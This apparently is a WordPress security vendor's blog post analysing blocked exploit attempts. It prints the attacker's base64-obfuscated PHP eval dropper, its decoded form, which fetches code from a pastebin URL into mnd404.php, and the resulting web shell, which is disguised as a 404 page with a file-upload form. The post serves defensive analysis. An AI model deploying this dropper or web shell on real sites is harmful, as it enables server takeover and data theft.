Hackers Won’t be Blocked From Trying to Upload This to Your WordPress Website by Other Firewall Plugins
Two months ago we did testing that showed that WordPress security plugins didn’t protect against exploitation of vulnerabilities that involved sending user input containing PHP code as raw POST data that would be read in PHP from php://input:. At the time, we improved our new Plugin Vulnerabilities Firewall to address that type of exploit. Based on the results of our automated testing, none of the other firewall plugins for WordPress have followed our lead and added protection against this in the subsequent two months.
Today our firewall stopped multiple attempts to exploit this type of issue on our website. These attempts would have failed anyway, since the attempts involved trying to exploit software not on our website, but the attempts and the firewall’s logging gave us a chance to see what the hacker was trying to do.
Here is the PHP code that was sent with the requests:
<?php eval('?>'.base64_decode('PD9waHANCmZ1bmN0aW9uIGFkbWluZXIoJHVybCwgJGlzaSkgew0KCSRmcCA9IGZvcGVuKCRpc2ksICJ3Iik7DQoJJGNoID0gY3VybF9pbml0KCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCB0cnVlKTsNCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOw0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GSUxFLCAkZnApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsNCgljdXJsX2Nsb3NlKCRjaCk7DQoJZmNsb3NlKCRmcCk7DQoJb2JfZmx1c2goKTsNCglmbHVzaCgpOw0KfQ0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0tOUFNxVHVQIiwibW5kNDA0LnBocCIpKSB7DQoJZWNobyAiU3Vrc2VzIjsNCn0gZWxzZSB7DQoJZWNobyAiZmFpbCI7DQp9DQo/Pg==')); ?> |
Most of that is obfuscated using base64 encoding, which can easily be decoded. Here is what was obfuscated:
<?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(adminer("https://pastebin.com/raw/KNPSqTuP","mnd404.php")) { echo "Sukses"; } else { echo "fail"; } ?> |
That will get the contents of the file located at https://pastebin.com/raw/KNPSqTuP and save it to a file on the website named mnd404.php.
The file being added would contain the following code:
<?php if(isset($_GET["mndxdz"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Berhasil Cok</b>-->".$_FILES["f"]["name"];}else{echo"<b>Gagal Cok";}}}?><title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache This Server Port 80</address> </body></html> |
That has code that will display “information about the operating system PHP is running on” that is output from the PHP function php_uname(). The other code in it would permit uploading additional files to the website.
That file has been on pastebin.com since July 2020. Another variant of the same file has been on there since November 2017.